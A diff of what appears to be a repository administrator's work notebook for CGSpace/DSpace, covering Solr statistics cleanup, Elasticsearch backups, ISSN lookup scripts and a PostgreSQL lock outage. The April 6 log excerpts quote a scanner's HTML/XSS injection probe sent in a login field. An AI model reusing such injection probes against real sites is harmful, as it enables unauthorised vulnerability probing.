    • He says it works for him in Firefox, so I checked and it seems to have been an issue with my LocalCDN addon
    • +
    +
  • +
  • I re-deployed DSpace Test (linode26) from the latest CGSpace (linode18) data +
      +
    • I want to try to finish up processing the duplicates in Solr that Atmire advised on last month
    • +
    • The current statistics core is 57861236 kilobytes (about 55GB):
    • +
    +
  • +
+
# du -s /home/dspacetest.cgiar.org/solr/statistics
+57861236        /home/dspacetest.cgiar.org/solr/statistics
+
    +
  • I applied their changes to config/spring/api/atmire-cua-update.xml and started the duplicate processor:
  • +
+
$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx4096m'
+$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -r 1000 -c statistics -t 12
+
    +
  • The default number of records per query is 10,000, which caused memory issues, so I will try with 1000 (Atmire used 100, but that seems too low!)
  • +
  • Hah, I still got a memory error after only a few minutes:
  • +
+
...
+Run 1 —  80% — 5,000/6,263 docs — 25s — 6m 31s                                      
+Exception: GC overhead limit exceeded                                                                          
+java.lang.OutOfMemoryError: GC overhead limit exceeded 
+
    +
  • I guess we really do have to use -r 100
  • +
  • Now the thing runs for a few minutes and “finishes”:
  • +
+
$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -r 100 -c statistics -t 12
+Loading @mire database changes for module MQM
+Changes have been processed
+
+
+*************************
+* Update Script Started *
+*************************
+
+Run 1
+Start updating Solr Storage Reports | Wed Mar 24 14:42:17 CET 2021
+Deleting old storage docs from Solr... | Wed Mar 24 14:42:17 CET 2021
+Done. | Wed Mar 24 14:42:17 CET 2021
+Processing storage reports for type: eperson | Wed Mar 24 14:42:17 CET 2021
+Done. | Wed Mar 24 14:42:41 CET 2021
+Processing storage reports for type: group | Wed Mar 24 14:42:41 CET 2021
+Done. | Wed Mar 24 14:45:46 CET 2021
+Processing storage reports for type: collection | Wed Mar 24 14:45:46 CET 2021
+Done. | Wed Mar 24 14:45:54 CET 2021
+Processing storage reports for type: community | Wed Mar 24 14:45:54 CET 2021
+Done. | Wed Mar 24 14:45:58 CET 2021
+Committing to Solr... | Wed Mar 24 14:45:58 CET 2021
+Done. | Wed Mar 24 14:45:59 CET 2021
+Successfully finished updating Solr Storage Reports | Wed Mar 24 14:45:59 CET 2021
+Run 1 —   2% — 100/4,824 docs — 3m 47s — 3m 47s
+Run 1 —   4% — 200/4,824 docs — 2s — 3m 50s
+Run 1 —   6% — 300/4,824 docs — 2s — 3m 53s
+Run 1 —   8% — 400/4,824 docs — 2s — 3m 55s
+Run 1 —  10% — 500/4,824 docs — 2s — 3m 58s
+Run 1 —  12% — 600/4,824 docs — 2s — 4m 1s
+Run 1 —  15% — 700/4,824 docs — 2s — 4m 3s
+Run 1 —  17% — 800/4,824 docs — 2s — 4m 6s
+Run 1 —  19% — 900/4,824 docs — 2s — 4m 9s
+Run 1 —  21% — 1,000/4,824 docs — 2s — 4m 11s
+Run 1 —  23% — 1,100/4,824 docs — 2s — 4m 14s
+Run 1 —  25% — 1,200/4,824 docs — 2s — 4m 16s
+Run 1 —  27% — 1,300/4,824 docs — 2s — 4m 19s
+Run 1 —  29% — 1,400/4,824 docs — 2s — 4m 22s
+Run 1 —  31% — 1,500/4,824 docs — 2s — 4m 24s
+Run 1 —  33% — 1,600/4,824 docs — 2s — 4m 27s
+Run 1 —  35% — 1,700/4,824 docs — 2s — 4m 29s
+Run 1 —  37% — 1,800/4,824 docs — 2s — 4m 32s
+Run 1 —  39% — 1,900/4,824 docs — 2s — 4m 35s
+Run 1 —  41% — 2,000/4,824 docs — 2s — 4m 37s
+Run 1 —  44% — 2,100/4,824 docs — 2s — 4m 40s
+Run 1 —  46% — 2,200/4,824 docs — 2s — 4m 42s
+Run 1 —  48% — 2,300/4,824 docs — 2s — 4m 45s
+Run 1 —  50% — 2,400/4,824 docs — 2s — 4m 48s
+Run 1 —  52% — 2,500/4,824 docs — 2s — 4m 50s
+Run 1 —  54% — 2,600/4,824 docs — 2s — 4m 53s
+Run 1 —  56% — 2,700/4,824 docs — 2s — 4m 55s
+Run 1 —  58% — 2,800/4,824 docs — 2s — 4m 58s
+Run 1 —  60% — 2,900/4,824 docs — 2s — 5m 1s
+Run 1 —  62% — 3,000/4,824 docs — 2s — 5m 3s
+Run 1 —  64% — 3,100/4,824 docs — 2s — 5m 6s
+Run 1 —  66% — 3,200/4,824 docs — 3s — 5m 9s
+Run 1 —  68% — 3,300/4,824 docs — 2s — 5m 12s
+Run 1 —  70% — 3,400/4,824 docs — 2s — 5m 14s
+Run 1 —  73% — 3,500/4,824 docs — 2s — 5m 17s
+Run 1 —  75% — 3,600/4,824 docs — 2s — 5m 20s
+Run 1 —  77% — 3,700/4,824 docs — 2s — 5m 22s
+Run 1 —  79% — 3,800/4,824 docs — 2s — 5m 25s
+Run 1 —  81% — 3,900/4,824 docs — 2s — 5m 27s
+Run 1 —  83% — 4,000/4,824 docs — 2s — 5m 30s
+Run 1 —  85% — 4,100/4,824 docs — 2s — 5m 33s
+Run 1 —  87% — 4,200/4,824 docs — 2s — 5m 35s
+Run 1 —  89% — 4,300/4,824 docs — 2s — 5m 38s
+Run 1 —  91% — 4,400/4,824 docs — 2s — 5m 41s
+Run 1 —  93% — 4,500/4,824 docs — 2s — 5m 43s
+Run 1 —  95% — 4,600/4,824 docs — 2s — 5m 46s
+Run 1 —  97% — 4,700/4,824 docs — 2s — 5m 49s
+Run 1 — 100% — 4,800/4,824 docs — 2s — 5m 51s
+Run 1 — 100% — 4,824/4,824 docs — 2s — 5m 53s
+Run 1 took 5m 53s
+
+
+**************************
+* Update Script Finished *
+**************************
+
+

2021-03-25

+
    +
  • Niroshini from IWMI is still having problems adding metadata during the edit step of the workflow on CGSpace +
      +
    • I told her to try to register using a private email account and we’ll add her to the WLE group so she can try that way
    • +
    +
  • +
+

2021-03-28

+
    +
  • Make a backup of the openrxv-items-final index on AReS Explorer and start a new harvest
  • +
+

2021-03-29

+
    +
  • The AReS harvesting that I started yesterday finished successfully and all indexes look OK: +
      +
    • openrxv-items is an alias of openrxv-items-final and has a correct number of items
    • +
    +
  • +
  • Last week Bosede from IITA said she was trying to move an item from one collection to another and the system was “rolling” and never finished +
      +
    • I looked in Munin and I don’t see anything particularly wrong that day, so I told her to try again
    • +
    +
  • +
  • Marianne Gadeberg asked about mapping an item last week +
      +
    • I searched for the item’s handle, the title, the title in quotes, the UUID, with pluses instead of spaces, etc in the item mapper… but I could never find it in the results
    • +
    • I see someone has reported this issue on Jira in DSpace 5.x’s XMLUI item mapper: https://jira.lyrasis.org/browse/DS-2761
    • +
    • The Solr log shows that my query (with and without quotes, etc) has 143 results:
    • +
    +
  • +
+
2021-03-29 08:55:40,073 INFO  org.apache.solr.core.SolrCore @ [search] webapp=/solr path=/select params={q=Gender+mainstreaming+in+local+potato+seed+system+in+Georgia&fl=handle,search.resourcetype,search.resourceid,search.uniqueid&start=0&fq=NOT(withdrawn:true)&fq=NOT(discoverable:false)&fq=-location:l5308ea39-7c65-401b-890b-c2b93dad649a&wt=javabin&version=2} hits=143 status=0 QTime=0
+
    +
  • But the item mapper only displays ten items, with no pagination +
      +
    • There is no way to search by handle or ID
    • +
    • I mapped the item manually using a CSV
    • +
    +
  • +
+
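  • For reference, the manual mapping uses DSpace’s batch metadata editing CSV, where extra collections in the collection column become mappings; the UUID and handles below are placeholders, but the file looks roughly like:

id,collection
aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee,10568/OWNING-COLLECTION||10568/MAPPED-COLLECTION

  • The first collection is the owning collection and any additional handles, separated by ||, become mappings; importing the file with dspace metadata-import -f mapping.csv applies the change (this is from memory, so double-check the separator against the DSpace batch metadata editing docs)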

2021-03-30

+
    +
  • I realized I never finished deleting all the old fields after our CG Core migration a few months ago +
      +
    • I found a few occurrences of old metadata so I had to move them where possible and delete them where not
    • +
    +
  • +
  • I updated the CG Core v2 migration page
  • +
  • Marianne Gadeberg wrote to ask why the item she wanted to map a few days ago still doesn’t appear in the mapped collection +
      +
    • I looked on the item page itself and it lists the collection, but doesn’t appear in the collection list
    • +
    • I tried to forcibly reindex the collection and the item, but it didn’t seem to work
    • +
    • Now I will try a complete Discovery re-index
    • +
    +
  • +
+

2021-03-31

+
    +
  • The Discovery re-index finished, but the CIP item still does not appear in the GENDER Platform grants collection +
      +
    • The item page itself DOES list the grants collection! WTF
    • +
    • I sent a message to the dspace-tech mailing list to see if someone can comment
    • +
    • I even tried unmapping and re-mapping, but it doesn’t change anything: the item still doesn’t appear in the collection, but I can see that it is mapped
    • +
    +
  • +
  • I signed up for a SHERPA API key so I can try to write something to get journal names from ISSN +
      +
    • This code seems to get a journal title, though I only tried it with a few ISSNs:
    • +
    +
  • +
+
import requests
+
+query_params = {'item-type': 'publication', 'format': 'Json', 'limit': 10, 'offset': 0, 'api-key': 'blahhhahahah', 'filter': '[["issn","equals","0011-183X"]]'}
+# Note: the query parameters need to actually be passed with the request
+r = requests.get('https://v2.sherpa.ac.uk/cgi/retrieve', params=query_params)
+if r.status_code == 200 and len(r.json()['items']) > 0:
+    print(r.json()['items'][0]['title'][0]['title'])
+
    +
  • I exported a list of all our ISSNs from CGSpace:
  • +
+
localhost/dspace63= > \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=253) to /tmp/2021-03-31-issns.csv;
+COPY 3081
+
    +
  • I wrote a script to check the ISSNs against Crossref’s API: crossref-issn-lookup.py +
      +
    • I suspect Crossref might have better data actually…
    • +
    +
  • +
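  • The gist of such a lookup against Crossref’s public REST API, which has a /journals/{issn} endpoint (a sketch; the real crossref-issn-lookup.py may differ):

import csv

import requests

# /tmp/2021-03-31-issns.csv is the list exported from PostgreSQL above
with open("/tmp/2021-03-31-issns.csv") as issns, open("/tmp/crossref-journals.csv", "w", newline="") as out:
    writer = csv.writer(out)
    writer.writerow(["issn", "title"])
    for issn in (line.strip() for line in issns):
        # Crossref returns HTTP 404 for ISSNs it doesn't know about
        r = requests.get(f"https://api.crossref.org/journals/{issn}")
        title = r.json()["message"]["title"] if r.status_code == 200 else ""
        writer.writerow([issn, title])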
diff --git a/docs/2021-04/index.html b/docs/2021-04/index.html
new file mode 100644
index 000000000..2d94a08a0
--- /dev/null
+++ b/docs/2021-04/index.html
@@ -0,0 +1,1096 @@

April, 2021

+ +
+

2021-04-01

+
    +
  • I wrote a script to query Sherpa’s API for our ISSNs: sherpa-issn-lookup.py +
      +
    • I’m curious to see how the results compare with the results from Crossref yesterday
    • +
    +
  • +
  • AReS Explorer was down since this morning, I didn’t see anything in the systemd journal +
      +
    • I simply took everything down with docker-compose and then back up, and then it was OK
    • +
    • Perhaps one of the containers crashed, I should have looked closer but I was in a hurry
    • +
    +
  • +
+

2021-04-03

+
    +
  • Biruk from ICT contacted me to say that some CGSpace users still can’t log in +
      +
    • I guess the CGSpace LDAP bind account is really still locked after last week’s reset
    • +
    • He fixed the account and then I was finally able to bind and query:
    • +
    +
  • +
+
$ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "cgspace-account" -W "(sAMAccountName=otheraccounttoquery)"
+

2021-04-04

+
    +
  • Check the index aliases on AReS Explorer to make sure they are sane before starting a new harvest:
  • +
+
$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool | less
+
    +
  • Then set the openrxv-items-final index to read-only so we can make a backup:
  • +
+
$ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}' 
+{"acknowledged":true}%
+$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-backup
+{"acknowledged":true,"shards_acknowledged":true,"index":"openrxv-items-final-backup"}%
+$ curl -X PUT "localhost:9200/openrxv-items-final/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
+
    +
  • Then start a harvesting on AReS Explorer
  • +
  • Help Enrico get some 2020 statistics for the Roots, Tubers and Bananas (RTB) community on CGSpace +
      +
    • He was hitting a bug on AReS and also he only needed stats for 2020, and AReS currently only gives all-time stats
    • +
    +
  • +
  • I cleaned up about 230 ISSNs on CGSpace in OpenRefine +
      +
    • I had exported them last week, then filtered for anything not looking like an ISSN with this GREL: isNotNull(value.match(/^\p{Alnum}{4}-\p{Alnum}{4}$/))
    • +
    • Then I applied them on CGSpace with the fix-metadata-values.py script:
    • +
    +
  • +
+
$ ./ilri/fix-metadata-values.py -i /tmp/2021-04-01-ISSNs.csv -db dspace -u dspace -p 'fuuu' -f cg.issn -t 'correct' -m 253
+
    +
  • For now I only fixed obvious errors like “1234-5678.” and “e-ISSN: 1234-5678” etc, but there are still lots of invalid ones which need more manual work: +
      +
    • Too few characters
    • +
    • Too many characters
    • +
    • ISBNs
    • +
    +
  • +
  • Create the CGSpace community and collection structure for the new Accelerating Impacts of CGIAR Climate Research for Africa (AICCRA) and assign all workflow steps
  • +
+
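  • For the remaining invalid ISSNs, the check digit can also be validated programmatically; a quick sketch of the standard ISSN mod-11 algorithm:

import re

def valid_issn(issn: str) -> bool:
    # Format is NNNN-NNNC where the check character C can be X (for ten)
    if not re.match(r"^[0-9]{4}-[0-9]{3}[0-9Xx]$", issn):
        return False
    digits = issn.replace("-", "").upper()
    # Weight the first seven digits 8..2, then compute the mod-11 check digit
    total = sum(int(d) * w for d, w in zip(digits[:7], range(8, 1, -1)))
    check = (11 - total % 11) % 11
    return digits[7] == ("X" if check == 10 else str(check))

print(valid_issn("0011-183X"))  # True (the ISSN from the SHERPA example above)
print(valid_issn("1234-5678"))  # False (bad check digit)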

2021-04-05

+
    +
  • The AReS Explorer harvesting from yesterday finished, and the results look OK, but actually the Elasticsearch indexes are messed up again:
  • +
+
$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
+{
+    "openrxv-items-final": {
+        "aliases": {}
+    },
+    "openrxv-items-temp": {
+        "aliases": {
+            "openrxv-items": {}
+        }
+    },
+...
+}
+
    +
  • openrxv-items should be an alias of openrxv-items-final, not openrxv-items-temp… I will have to fix that manually
  • +
  • Enrico asked for more information on the RTB stats I gave him yesterday +
      +
    • I remembered (again) that we can’t filter Atmire’s CUA stats by date issued
    • +
    • To show, for example, views/downloads in the year 2020 for RTB issued in 2020, we would need to use the DSpace statistics API and post a list of IDs and a custom date range
    • +
    • I tried to do that here by exporting the RTB community and extracting the IDs for items issued in 2020:
    • +
    +
  • +
+
$ ~/dspace63/bin/dspace metadata-export -i 10568/80100 -f /tmp/rtb.csv
+$ csvcut -c 'id,dcterms.issued,dcterms.issued[],dcterms.issued[en_US]' /tmp/rtb.csv | \
+  sed '1d' | \
+  csvsql --no-header --no-inference --query 'SELECT a AS id,COALESCE(b, "")||COALESCE(c, "")||COALESCE(d, "") AS issued FROM stdin' | \
+  csvgrep -c issued -m 2020 | \
+  csvcut -c id | \
+  sed '1d' | \
+  sort | \
+  uniq
+
    +
  • So I remember in the future, this basically does the following: +
      +
    • Use csvcut to extract the id and all date issued columns from the CSV
    • +
    • Use sed to remove the header so we can refer to the columns using default a, b, c instead of their real names (which are tricky to match due to special characters)
    • +
    • Use csvsql to concatenate the various date issued columns (coalescing where null)
    • +
    • Use csvgrep to filter items by date issued in 2020
    • +
    • Use csvcut to extract the id column
    • +
    • Use sed to delete the header row
    • +
    • Use sort and uniq to filter out any duplicate IDs (there were three)
    • +
    +
  • +
  • Then I have a list of 296 IDs for RTB items issued in 2020
  • +
  • I constructed a JSON file to post to the DSpace Statistics API:
  • +
+
{
+  "limit": 100,
+  "page": 0,
+  "dateFrom": "2020-01-01T00:00:00Z",
+  "dateTo": "2020-12-31T00:00:00Z",
+  "items": [
+"00358715-b70c-4fdd-aa55-730e05ba739e",
+"004b54bb-f16f-4cec-9fbc-ab6c6345c43d",
+"02fb7630-d71a-449e-b65d-32b4ea7d6904",
+...
+  ]
+}
+
    +
  • Then I submitted the file three times (changing the page parameter):
  • +
+
$ curl -s -d @/tmp/2020-items.txt https://cgspace.cgiar.org/rest/statistics/items | json_pp > /tmp/page1.json
+$ curl -s -d @/tmp/2020-items.txt https://cgspace.cgiar.org/rest/statistics/items | json_pp > /tmp/page2.json
+$ curl -s -d @/tmp/2020-items.txt https://cgspace.cgiar.org/rest/statistics/items | json_pp > /tmp/page3.json
+
    +
  • Then I extracted the views and downloads in the most ridiculous way:
  • +
+
$ grep views /tmp/page*.json | grep -o -E '[0-9]+$' | sed 's/,//' | xargs | sed -e 's/ /+/g' | bc
+30364
+$ grep downloads /tmp/page*.json | grep -o -E '[0-9]+,' | sed 's/,//' | xargs | sed -e 's/ /+/g' | bc
+9100
+
    +
  • For curiousity I did the same exercise for items issued in 2019 and got the following: +
      +
    • Views: 30721
    • +
    • Downloads: 10205
    • +
    +
  • +
+
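  • A less ridiculous way would be to page through the API and sum the fields in Python (a sketch; it assumes the per-item results come back under a statistics key, while the views and downloads keys are the same ones grepped above):

import json

import requests

# /tmp/2020-items.txt is the JSON body shown above (limit, dateFrom, dateTo, items)
with open("/tmp/2020-items.txt") as f:
    payload = json.load(f)

views = downloads = 0
for page in range(3):  # three pages of 100 items covers the 296 IDs
    payload["page"] = page
    r = requests.post("https://cgspace.cgiar.org/rest/statistics/items", json=payload)
    # Assumption: per-item results are in a "statistics" list with views/downloads
    for item in r.json()["statistics"]:
        views += item["views"]
        downloads += item["downloads"]

print(f"views: {views}, downloads: {downloads}")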

2021-04-06

+
    +
  • Margarita from CCAFS was having problems deleting an item from CGSpace again +
      +
    • The error was “Authorization denied for action OBSOLETE (DELETE) on BITSTREAM:bd157345-448e …”
    • +
    • This is the same issue as last month
    • +
    +
  • +
  • Create a new collection on CGSpace for a new CIP project at Mishel Portilla’s request
  • +
  • I got a notice that CGSpace was down +
      +
    • I didn’t see anything strange at first, but there are an insane amount of database connections:
    • +
    +
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+12413
+
    +
  • The system journal shows thousands of these messages; this is the first one:
  • +
+
Apr 06 07:52:13 linode18 tomcat7[556]: Apr 06, 2021 7:52:13 AM org.apache.tomcat.jdbc.pool.ConnectionPool abandon
+
    +
  • Around that time in the dspace log I see nothing unusual, but maybe these?
  • +
+
2021-04-06 07:52:29,409 INFO  com.atmire.dspace.cua.CUASolrLoggerServiceImpl @ Updating : 200/127 docs in http://localhost:8081/solr/statistics
+
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+3640
+$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+2968
+$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+13
+
    +
  • After ten minutes or so it went back down…
  • +
  • And now it’s back up in the thousands… I am seeing a lot of stuff in dspace log like this:
  • +
+
2021-04-06 11:59:34,364 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717951
+2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717952
+2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717953
+2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717954
+2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717955
+2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717956
+2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717957
+2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717958
+2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717959
+2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717960
+2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717961
+2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717962
+2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717963
+2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717964
+2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717965
+2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717966
+2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717967
+2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717968
+2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717969
+2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717970
+2021-04-06 11:59:34,365 INFO  org.dspace.content.MetadataValueServiceImpl @ user.hidden@cgiar.org:session_id=65F32E67CE8E347F64EFB5EB4E349B9B:delete_metadata_value: metadata_value_id=5717971
+
    +
  • I sent some notes and a log to Atmire on our existing issue about the database stuff +
      +
    • Also I asked them about the possibility of doing a formal review of Hibernate
    • +
    +
  • +
  • Falcon 3.0.0 was released so I updated the 3.0.0 branch for dspace-statistics-api and merged it to v6_x +
      +
    • I also fixed one minor (unrelated) bug in the tests
    • +
    • Then I deployed the new version on DSpace Test
    • +
    +
  • +
  • I had a meeting with Peter and Abenet about CGSpace TODOs
  • +
  • CGSpace went down again and the PostgreSQL locks are through the roof:
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+12154
+
    +
  • I don’t see any activity on the REST API, but in the last four hours there have been 3,500 DSpace sessions:
  • +
+
# grep -a -E '2021-04-06 (13|14|15|16|17):' /home/cgspace.cgiar.org/log/dspace.log.2021-04-06 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
+3547
+
    +
  • I looked at the same time of day for the past few weeks and it seems to be a normal number of sessions:
  • +
+
# for file in /home/cgspace.cgiar.org/log/dspace.log.2021-0{3,4}-*; do grep -a -E "2021-0(3|4)-[0-9]{2} (13|14|15|16|17):" "$file" | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l; done
+...
+3572
+4085
+3476
+3128
+2949
+2016
+1839
+4513
+3463
+4425
+3328
+2783
+3898
+3848
+7799
+255
+534
+2755
+599
+4463
+3547
+
    +
  • What about total number of sessions per day?
  • +
+
# for file in /home/cgspace.cgiar.org/log/dspace.log.2021-0{3,4}-*; do echo "$file:"; grep -a -o -E 'session_id=[A-Z0-9]{32}' "$file" | sort | uniq | wc -l; done
+...
+/home/cgspace.cgiar.org/log/dspace.log.2021-03-28:
+11784
+/home/cgspace.cgiar.org/log/dspace.log.2021-03-29:
+15104
+/home/cgspace.cgiar.org/log/dspace.log.2021-03-30:
+19396
+/home/cgspace.cgiar.org/log/dspace.log.2021-03-31:
+32612
+/home/cgspace.cgiar.org/log/dspace.log.2021-04-01:
+26037
+/home/cgspace.cgiar.org/log/dspace.log.2021-04-02:
+14315
+/home/cgspace.cgiar.org/log/dspace.log.2021-04-03:
+12530
+/home/cgspace.cgiar.org/log/dspace.log.2021-04-04:
+13138
+/home/cgspace.cgiar.org/log/dspace.log.2021-04-05:
+16756
+/home/cgspace.cgiar.org/log/dspace.log.2021-04-06:
+12343
+
    +
  • So it’s not the number of sessions… it’s something with the workload…
  • +
  • I had to step away for an hour or so and when I came back the site was still down and there were still 12,000 locks +
      +
    • I restarted postgresql and tomcat7…
    • +
    +
  • +
  • The locks in PostgreSQL shot up again…
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+3447
+$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+3527
+$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+4582
+
    +
  • I don’t know what the hell is going on, but the PostgreSQL connections and locks are way higher than ever before:
  • +
+

PostgreSQL connections week +PostgreSQL locks week +Tomcat database pool

+
    +
  • Otherwise, the number of DSpace sessions is completely normal:
  • +
+

DSpace sessions

+
    +
  • While looking at the nginx logs I see that MEL is trying to log into CGSpace’s REST API and delete items:
  • +
+
34.209.213.122 - - [06/Apr/2021:03:50:46 +0200] "POST /rest/login HTTP/1.1" 401 727 "-" "MEL"
+34.209.213.122 - - [06/Apr/2021:03:50:48 +0200] "DELETE /rest/items/95f52bf1-f082-4e10-ad57-268a76ca18ec/metadata HTTP/1.1" 401 704 "-" "-"
+
    +
  • I see a few of these per day going back several months +
      +
    • I sent a message to Salem and Enrico to ask if they know
    • +
    +
  • +
  • Also annoying, I see tons of what look like penetration testing requests from Qualys:
  • +
+
2021-04-04 06:35:17,889 INFO  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:failed_login:no DN found for user "'><qss a=X158062356Y1_2Z>
+2021-04-04 06:35:17,889 INFO  org.dspace.authenticate.PasswordAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:authenticate:attempting password auth of user="'><qss a=X158062356Y1_2Z>
+2021-04-04 06:35:17,890 INFO  org.dspace.app.xmlui.utils.AuthenticationUtil @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:failed_login:email="'><qss a=X158062356Y1_2Z>, realm=null, result=2
+2021-04-04 06:35:18,145 INFO  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:auth:attempting trivial auth of user=was@qualys.com
+2021-04-04 06:35:18,519 INFO  org.dspace.authenticate.LDAPAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:failed_login:no DN found for user was@qualys.com
+2021-04-04 06:35:18,520 INFO  org.dspace.authenticate.PasswordAuthentication @ anonymous:session_id=FF1E051BCA7D81CC5A807D85380D81E5:ip_addr=64.39.108.48:authenticate:attempting password auth of user=was@qualys.com
+
    +
  • I deleted the ilri/AReS repository on GitHub since we haven’t updated it in two years + +
  • +
  • 10PM and the server is down again, with locks through the roof:
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+12198
+
    +
  • I see that there are tons of PostgreSQL connections getting abandoned today, compared to very few in the past few weeks:
  • +
+
$ journalctl -u tomcat7 --since=today | grep -c 'ConnectionPool abandon'
+1838
+$ journalctl -u tomcat7 --since=2021-03-20 --until=2021-04-05 | grep -c 'ConnectionPool abandon'
+3
+
    +
  • I even restarted the server and connections were low for a few minutes until they shot back up:
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+13
+$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+8651
+$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+8940
